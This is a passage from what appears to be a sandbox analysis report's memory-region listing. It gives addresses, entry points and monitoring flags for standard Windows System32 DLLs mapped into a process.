0x7ffb0f133fff monitored = 0 entry_point = 0x7ffb0f122a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 664 start_va = 0x7ffb0f180000 end_va = 0x7ffb0f29cfff monitored = 0 entry_point = 0x7ffb0f1afe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 665 start_va = 0x7ffb10ae0000 end_va = 0x7ffb10b15fff monitored = 0 entry_point = 0x7ffb10ae27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 666 start_va = 0x7ffb10e10000 end_va = 0x7ffb10e20fff monitored = 0 entry_point = 0x7ffb10e17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 667 start_va = 0x7ffb10e30000 end_va = 0x7ffb10eb3fff monitored = 0 entry_point = 0x7ffb10e48d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 668 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 669 start_va = 0x7ffb10f60000 end_va = 0x7ffb11035fff monitored = 0 entry_point = 0x7ffb10f8a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 670 start_va = 0x7ffb11040000 end_va = 0x7ffb110a3fff monitored = 0 entry_point = 0x7ffb1105bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 671 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 672 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 673 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 674 start_va = 0x7ffb11200000 end_va = 0x7ffb11273fff monitored = 0 entry_point = 0x7ffb11215eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 675 start_va = 0x7ffb11280000 end_va = 0x7ffb113b6fff monitored = 0 entry_point = 0x7ffb112c0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 676 start_va = 0x7ffb11470000 end_va = 0x7ffb11485fff monitored = 0 entry_point = 0x7ffb11471af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 677 start_va = 0x7ffb11490000 end_va = 0x7ffb114a9fff monitored = 0 entry_point = 0x7ffb11492330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 678 start_va = 0x7ffb114b0000 end_va = 0x7ffb114bcfff monitored = 0 entry_point = 0x7ffb114b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 679 start_va = 0x7ffb115e0000 end_va = 0x7ffb115eefff monitored = 0 entry_point = 0x7ffb115e4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 680 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 681 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 682 start_va = 0x7ffb116c0000 end_va = 0x7ffb11741fff monitored = 0 entry_point = 0x7ffb116c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 683 start_va = 0x7ffb12610000 end_va = 0x7ffb12651fff monitored = 0 entry_point = 0x7ffb12613670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 684 start_va = 0x7ffb12660000 end_va = 0x7ffb126a5fff monitored = 0 entry_point = 0x7ffb126679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 685 start_va = 0x7ffb126b0000 end_va = 0x7ffb126effff monitored = 0 entry_point = 0x7ffb126bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 686 start_va = 0x7ffb126f0000 end_va = 0x7ffb12736fff monitored = 0 entry_point = 0x7ffb126f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 687 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 688 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 689 start_va = 0x7ffb127f0000 end_va = 0x7ffb12807fff monitored = 0 entry_point = 0x7ffb127f4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 690 start_va = 0x7ffb12810000 end_va = 0x7ffb12834fff monitored = 0 entry_point = 0x7ffb12815ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 691 start_va = 0x7ffb12850000 end_va = 0x7ffb12890fff monitored = 0 entry_point = 0x7ffb12853750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 692 start_va = 0x7ffb128a0000 end_va = 0x7ffb12992fff monitored = 0 entry_point = 0x7ffb128c5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 693 start_va = 0x7ffb12a60000 end_va = 0x7ffb12a77fff monitored = 0 entry_point = 0x7ffb12a62000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 694 start_va = 0x7ffb12a80000 end_va = 0x7ffb12c01fff monitored = 0 entry_point = 0x7ffb12a982a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 695 start_va = 0x7ffb12c10000 end_va = 0x7ffb12cb2fff monitored = 0 entry_point = 0x7ffb12c12c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 696 start_va = 0x7ffb12cc0000 end_va = 0x7ffb12d11fff monitored = 0 entry_point = 0x7ffb12cc5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 697 start_va = 0x7ffb12d40000 end_va = 0x7ffb12d6dfff monitored = 1 entry_point = 0x7ffb12d42300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 698 start_va = 0x7ffb12d70000 end_va = 0x7ffb12dcdfff monitored = 0 entry_point = 0x7ffb12d75080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 699 start_va = 0x7ffb12dd0000 end_va = 0x7ffb12deffff monitored = 0 entry_point = 0x7ffb12dd1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 700 start_va = 0x7ffb12df0000 end_va = 0x7ffb12df8fff monitored = 0 entry_point = 0x7ffb12df18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 701 start_va = 0x7ffb12e00000 end_va = 0x7ffb12e10fff monitored = 0 entry_point = 0x7ffb12e01d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 702 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 703 start_va = 0x7ffb12fb0000 end_va = 0x7ffb12febfff monitored = 0 entry_point = 0x7ffb12fb6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 704 start_va = 0x7ffb13040000 end_va = 0x7ffb1308bfff monitored = 0 entry_point = 0x7ffb13055310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 705 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 706 start_va = 0x7ffb14500000 end_va = 0x7ffb14534fff monitored = 0 entry_point = 0x7ffb1450a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 707 start_va = 0x7ffb16be0000 end_va = 0x7ffb16beffff monitored = 0 entry_point = 0x7ffb16be1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 708 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 709 start_va = 0x7ffb19500000 end_va = 0x7ffb19521fff monitored = 0 entry_point = 0x7ffb19512540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 710 start_va = 0x7ffb19530000 end_va = 0x7ffb19604fff monitored = 0 entry_point = 0x7ffb1954cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 711 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 712 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 713 start_va = 0x7ffb1a350000 end_va = 0x7ffb1a358fff monitored = 0 entry_point = 0x7ffb1a3521d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 714 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 715 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 716 start_va = 0x7ffb1a5b0000 end_va = 0x7ffb1a5d7fff monitored = 0 entry_point = 0x7ffb1a5befc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 717 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 718 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 719 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 720 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 721 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 722 start_va = 0x7ffb1d1d0000 end_va = 0x7ffb1d1dffff monitored = 0 entry_point = 0x7ffb1d1d1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 723 start_va = 0x7ffb1d1e0000 end_va = 0x7ffb1d1e8fff monitored = 0 entry_point = 0x7ffb1d1e1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 724 start_va = 0x7ffb1d1f0000 end_va = 0x7ffb1d21cfff monitored = 0 entry_point = 0x7ffb1d1f2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 725 start_va = 0x7ffb1d220000 end_va = 0x7ffb1d271fff monitored = 0 entry_point = 0x7ffb1d2238e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 726 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 727 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 728 start_va = 0x7ffb1d810000 end_va = 0x7ffb1d82efff monitored = 0 entry_point = 0x7ffb1d814960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 729 start_va = 0x7ffb1d8c0000 end_va = 0x7ffb1d959fff monitored = 0 entry_point = 0x7ffb1d8dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 730 start_va = 0x7ffb1d960000 end_va = 0x7ffb1d974fff monitored = 0 entry_point = 0x7ffb1d963460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 731 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 732 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 733 start_va = 0x7ffb1dc60000 end_va = 0x7ffb1dd1ffff monitored = 0 entry_point = 0x7ffb1dc8fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 734 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 735 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 736 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 737 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 738 start_va = 0x7ffb1ddb0000 end_va = 0x7ffb1de95fff monitored = 0 entry_point = 0x7ffb1ddccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 739 start_va = 0x7ffb1dff0000 end_va = 0x7ffb1e01dfff monitored = 0 entry_point = 0x7ffb1dff7550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 740 start_va = 0x7ffb1e020000 end_va = 0x7ffb1e02cfff monitored = 0 entry_point = 0x7ffb1e022ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 741 start_va = 0x7ffb1e030000 end_va = 0x7ffb1e05efff monitored = 0 entry_point = 0x7ffb1e038910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 742 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 743 start_va = 0x7ffb1e130000 end_va = 0x7ffb1e13ffff monitored = 0 entry_point = 0x7ffb1e132c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 744 start_va = 0x7ffb1e140000 end_va = 0x7ffb1e153fff monitored = 0 entry_point = 0x7ffb1e142d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 745 start_va = 0x7ffb1e440000 end_va = 0x7ffb1e4d2fff monitored = 0 entry_point = 0x7ffb1e449680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 746 start_va = 0x7ffb1e570000 end_va = 0x7ffb1e58cfff monitored = 0 entry_point = 0x7ffb1e574f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 747 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 748 start_va = 0x7ffb1e820000 end_va = 0x7ffb1e88dfff monitored = 0 entry_point = 0x7ffb1e827f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 749 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 750 start_va = 0x7ffb1e8b0000 end_va = 0x7ffb1e8f0fff monitored = 0 entry_point = 0x7ffb1e8c7eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 751 start_va = 0x7ffb1e900000 end_va = 0x7ffb1e9fbfff monitored = 0 entry_point = 0x7ffb1e936df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 752 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 753 start_va = 0x7ffb1eab0000 end_va = 0x7ffb1eac1fff monitored = 0 entry_point = 0x7ffb1eab9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 754 start_va = 0x7ffb1ead0000 end_va = 0x7ffb1eb80fff monitored = 0 entry_point = 0x7ffb1eb488b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 755 start_va = 0x7ffb1eb90000 end_va = 0x7ffb1ebb4fff monitored = 0 entry_point = 0x7ffb1eba2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 756 start_va = 0x7ffb1ebc0000 end_va = 0x7ffb1ebd0fff monitored = 0 entry_point = 0x7ffb1ebc7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 757 start_va = 0x7ffb1ebe0000 end_va = 0x7ffb1ebf9fff monitored = 0 entry_point = 0x7ffb1ebe2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 758 start_va = 0x7ffb1ec00000 end_va = 0x7ffb1ec0bfff monitored = 0 entry_point = 0x7ffb1ec014d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 759 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 760 start_va = 0x7ffb1ec70000 end_va = 0x7ffb1eca6fff monitored = 0 entry_point = 0x7ffb1ec76020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 761 start_va = 0x7ffb1ecb0000 end_va = 0x7ffb1eccffff monitored = 0 entry_point = 0x7ffb1ecb39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 762 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 763 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 764 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 765 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 766 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 767 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 768 start_va = 0x7ffb21180000 end_va = 0x7ffb212fbfff monitored = 0 entry_point = 0x7ffb211d1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 769 start_va = 0x7ffb21300000 end_va = 0x7ffb2130afff monitored = 0 entry_point = 0x7ffb21301770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 770 start_va = 0x7ffb21310000 end_va = 0x7ffb21326fff monitored = 0 entry_point = 0x7ffb21315630 region_type = mapped_file name = "sens.dll" filename = 